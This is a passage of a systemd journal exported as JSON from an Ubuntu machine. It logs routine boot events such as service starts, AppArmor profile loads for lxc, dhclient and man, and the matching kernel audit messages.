"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=204;b=e2b08827b5804427b422c10c84f1567e;m=69f639;t=5bd16dd2d75a0;x=9d78d1321ca2756", "__REALTIME_TIMESTAMP" : "1615280781227424", "__MONOTONIC_TIMESTAMP" : "6944313", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : 
"39f53479d3a045ac8e11786248231fbf", "UNIT" : "systemd-update-utmp.service", "INVOCATION_ID" : "4d1e0aa27016434c8dd74250bc4a0327", "MESSAGE" : "Started Update UTMP about System Boot/Shutdown.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781224990" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=205;b=e2b08827b5804427b422c10c84f1567e;m=6a826a;t=5bd16dd2e01d1;x=b54240324bbd03a7", "__REALTIME_TIMESTAMP" : "1615280781263313", "__MONOTONIC_TIMESTAMP" : "6980202", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_STREAM_ID" : "22889c4a7791419087171fcdbc582566", "SYSLOG_IDENTIFIER" : "apparmor", "MESSAGE" : " * Starting AppArmor profiles", "_PID" : "494", "_COMM" : "apparmor", "_EXE" : "/bin/dash", "_CMDLINE" : "/bin/sh /etc/init.d/apparmor start", "_SYSTEMD_CGROUP" : "/system.slice/apparmor.service", "_SYSTEMD_UNIT" : "apparmor.service", "_SYSTEMD_INVOCATION_ID" : "b73e15f39a704474b132a5d88c306fdb" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=206;b=e2b08827b5804427b422c10c84f1567e;m=6ae1af;t=5bd16dd2e6116;x=50c94c5dd5eeb412", "__REALTIME_TIMESTAMP" : "1615280781287702", "__MONOTONIC_TIMESTAMP" : "7004591", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : 
"job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "ebtables.service", "INVOCATION_ID" : "ca659a18573443f4b7253369397d23c9", "MESSAGE" : "Started ebtables ruleset management.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781284952" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=207;b=e2b08827b5804427b422c10c84f1567e;m=6c3082;t=5bd16dd2fafe9;x=7df85c9a8de74e58", "__REALTIME_TIMESTAMP" : "1615280781373417", "__MONOTONIC_TIMESTAMP" : "7090306", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "systemd-timesyncd.service", "INVOCATION_ID" : "02dc978d5d9147908ffca7c0020b3270", "MESSAGE" : "Started Network Time Synchronization.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781368527" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=208;b=e2b08827b5804427b422c10c84f1567e;m=6c30fa;t=5bd16dd2fb061;x=3716d06186f5c01e", "__REALTIME_TIMESTAMP" : "1615280781373537", "__MONOTONIC_TIMESTAMP" : "7090426", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : 
"/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Reached target System Time Synchronized.", "UNIT" : "time-sync.target", "INVOCATION_ID" : "f36253b2c17d489dabcad39f82479ebc", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781371007" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=209;b=e2b08827b5804427b422c10c84f1567e;m=70e9c0;t=5bd16dd346927;x=90e2c516be7e04e9", "__REALTIME_TIMESTAMP" : "1615280781682983", "__MONOTONIC_TIMESTAMP" : "7399872", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781676000", "_AUDIT_TYPE" : "1400", "_AUDIT_ID" : "2", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"lxc-container-default\" pid=523 comm=\"apparmor_parser\"", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_AUDIT_FIELD_NAME" : "lxc-container-default", "_PID" : "523", "_COMM" : "apparmor_parser" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=20a;b=e2b08827b5804427b422c10c84f1567e;m=70ea9f;t=5bd16dd346a06;x=9c867e315db79cb9", "__REALTIME_TIMESTAMP" : "1615280781683206", "__MONOTONIC_TIMESTAMP" : "7400095", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7399857", "MESSAGE" : "audit: type=1400 
audit(1615280781.676:2): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"lxc-container-default\" pid=523 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=20b;b=e2b08827b5804427b422c10c84f1567e;m=70ecd7;t=5bd16dd346c3f;x=2c21b58f3c40574f", "__REALTIME_TIMESTAMP" : "1615280781683775", "__MONOTONIC_TIMESTAMP" : "7400663", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_PID" : "523", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781680000", "_AUDIT_ID" : "3", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"lxc-container-default-cgns\" pid=523 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "lxc-container-default-cgns" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=20c;b=e2b08827b5804427b422c10c84f1567e;m=70f799;t=5bd16dd347700;x=9b608a14e0fbea31", "__REALTIME_TIMESTAMP" : "1615280781686528", "__MONOTONIC_TIMESTAMP" : "7403417", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_PID" : "523", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781680000", "_AUDIT_ID" : "4", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"lxc-container-default-with-mounting\" pid=523 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "lxc-container-default-with-mounting" } { 
"__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=20d;b=e2b08827b5804427b422c10c84f1567e;m=70fa3e;t=5bd16dd3479a5;x=89a99b7b754d8e8b", "__REALTIME_TIMESTAMP" : "1615280781687205", "__MONOTONIC_TIMESTAMP" : "7404094", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7400658", "MESSAGE" : "audit: type=1400 audit(1615280781.680:3): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"lxc-container-default-cgns\" pid=523 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=20e;b=e2b08827b5804427b422c10c84f1567e;m=70fa68;t=5bd16dd3479cf;x=a19f71accf09174", "__REALTIME_TIMESTAMP" : "1615280781687247", "__MONOTONIC_TIMESTAMP" : "7404136", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7403411", "MESSAGE" : "audit: type=1400 audit(1615280781.680:4): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"lxc-container-default-with-mounting\" pid=523 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=20f;b=e2b08827b5804427b422c10c84f1567e;m=70fab6;t=5bd16dd347a1e;x=531b7de5d920da5d", "__REALTIME_TIMESTAMP" : "1615280781687326", "__MONOTONIC_TIMESTAMP" : "7404214", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_PID" : "523", "_COMM" : "apparmor_parser", 
"_SOURCE_REALTIME_TIMESTAMP" : "1615280781684000", "_AUDIT_ID" : "5", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"lxc-container-default-with-nesting\" pid=523 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "lxc-container-default-with-nesting" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=210;b=e2b08827b5804427b422c10c84f1567e;m=7109e4;t=5bd16dd34894c;x=1bb336b25c13feeb", "__REALTIME_TIMESTAMP" : "1615280781691212", "__MONOTONIC_TIMESTAMP" : "7408100", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7404210", "MESSAGE" : "audit: type=1400 audit(1615280781.684:5): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"lxc-container-default-with-nesting\" pid=523 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=211;b=e2b08827b5804427b422c10c84f1567e;m=740920;t=5bd16dd378887;x=4e977cd2df564d8e", "__REALTIME_TIMESTAMP" : "1615280781887623", "__MONOTONIC_TIMESTAMP" : "7604512", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781884000", "_AUDIT_ID" : "6", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/sbin/dhclient\" pid=527 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "/sbin/dhclient", "_PID" : "527" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=212;b=e2b08827b5804427b422c10c84f1567e;m=740c10;t=5bd16dd378b78;x=392dcb54c67371c2", "__REALTIME_TIMESTAMP" : "1615280781888376", "__MONOTONIC_TIMESTAMP" : "7605264", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781884000", "_PID" : "527", "_AUDIT_ID" : "7", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/lib/NetworkManager/nm-dhcp-client.action\" pid=527 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "/usr/lib/NetworkManager/nm-dhcp-client.action" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=213;b=e2b08827b5804427b422c10c84f1567e;m=740e5e;t=5bd16dd378dc6;x=9a77ee7cec693e7e", "__REALTIME_TIMESTAMP" : "1615280781888966", "__MONOTONIC_TIMESTAMP" : "7605854", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781884000", "_PID" : "527", "_AUDIT_ID" : "8", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/lib/NetworkManager/nm-dhcp-helper\" pid=527 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "/usr/lib/NetworkManager/nm-dhcp-helper" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=214;b=e2b08827b5804427b422c10c84f1567e;m=7410ae;t=5bd16dd379015;x=ada4a1831bf5991d", 
"__REALTIME_TIMESTAMP" : "1615280781889557", "__MONOTONIC_TIMESTAMP" : "7606446", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781884000", "_PID" : "527", "_AUDIT_ID" : "9", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/lib/connman/scripts/dhclient-script\" pid=527 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "/usr/lib/connman/scripts/dhclient-script" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=215;b=e2b08827b5804427b422c10c84f1567e;m=741713;t=5bd16dd37967a;x=201ee3deb2c44ea4", "__REALTIME_TIMESTAMP" : "1615280781891194", "__MONOTONIC_TIMESTAMP" : "7608083", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7604498", "MESSAGE" : "audit: type=1400 audit(1615280781.884:6): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/sbin/dhclient\" pid=527 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=216;b=e2b08827b5804427b422c10c84f1567e;m=74176c;t=5bd16dd3796d4;x=713739dbd95eae3", "__REALTIME_TIMESTAMP" : "1615280781891284", "__MONOTONIC_TIMESTAMP" : "7608172", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7605258", "MESSAGE" : "audit: type=1400 
audit(1615280781.884:7): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/lib/NetworkManager/nm-dhcp-client.action\" pid=527 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=217;b=e2b08827b5804427b422c10c84f1567e;m=7417b9;t=5bd16dd379720;x=774be3c5b932a4a9", "__REALTIME_TIMESTAMP" : "1615280781891360", "__MONOTONIC_TIMESTAMP" : "7608249", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7605849", "MESSAGE" : "audit: type=1400 audit(1615280781.884:8): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/lib/NetworkManager/nm-dhcp-helper\" pid=527 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=218;b=e2b08827b5804427b422c10c84f1567e;m=7417da;t=5bd16dd379741;x=ca3690b9ca2053ef", "__REALTIME_TIMESTAMP" : "1615280781891393", "__MONOTONIC_TIMESTAMP" : "7608282", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7606441", "MESSAGE" : "audit: type=1400 audit(1615280781.884:9): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/lib/connman/scripts/dhclient-script\" pid=527 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=219;b=e2b08827b5804427b422c10c84f1567e;m=744f27;t=5bd16dd37ce8f;x=f9560e2a0e92290e", "__REALTIME_TIMESTAMP" : "1615280781905551", "__MONOTONIC_TIMESTAMP" : "7622439", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", 
"SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781900000", "_AUDIT_ID" : "10", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/bin/lxc-start\" pid=529 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "/usr/bin/lxc-start", "_PID" : "529" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=21a;b=e2b08827b5804427b422c10c84f1567e;m=74556b;t=5bd16dd37d4d2;x=de42aec6db752bfc", "__REALTIME_TIMESTAMP" : "1615280781907154", "__MONOTONIC_TIMESTAMP" : "7624043", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7622430", "MESSAGE" : "audit: type=1400 audit(1615280781.900:10): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/bin/lxc-start\" pid=529 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=21b;b=e2b08827b5804427b422c10c84f1567e;m=758c7e;t=5bd16dd390be5;x=f4d167c850b5d58b", "__REALTIME_TIMESTAMP" : "1615280781986789", "__MONOTONIC_TIMESTAMP" : "7703678", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781980000", "_AUDIT_ID" : "11", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/bin/man\" pid=531 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : 
"/usr/bin/man", "_PID" : "531" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=21c;b=e2b08827b5804427b422c10c84f1567e;m=758ee1;t=5bd16dd390e49;x=e5b217df70efe210", "__REALTIME_TIMESTAMP" : "1615280781987401", "__MONOTONIC_TIMESTAMP" : "7704289", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781980000", "_PID" : "531", "_AUDIT_ID" : "12", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"man_filter\" pid=531 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "man_filter" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=21d;b=e2b08827b5804427b422c10c84f1567e;m=758f5a;t=5bd16dd390ec1;x=c0bbeffe5de99bf7", "__REALTIME_TIMESTAMP" : "1615280781987521", "__MONOTONIC_TIMESTAMP" : "7704410", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7703647", "MESSAGE" : "audit: type=1400 audit(1615280781.980:11): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/bin/man\" pid=531 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=21e;b=e2b08827b5804427b422c10c84f1567e;m=75915f;t=5bd16dd3910c6;x=28684cc8d8a1497c", "__REALTIME_TIMESTAMP" : "1615280781988038", "__MONOTONIC_TIMESTAMP" : "7704927", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", 
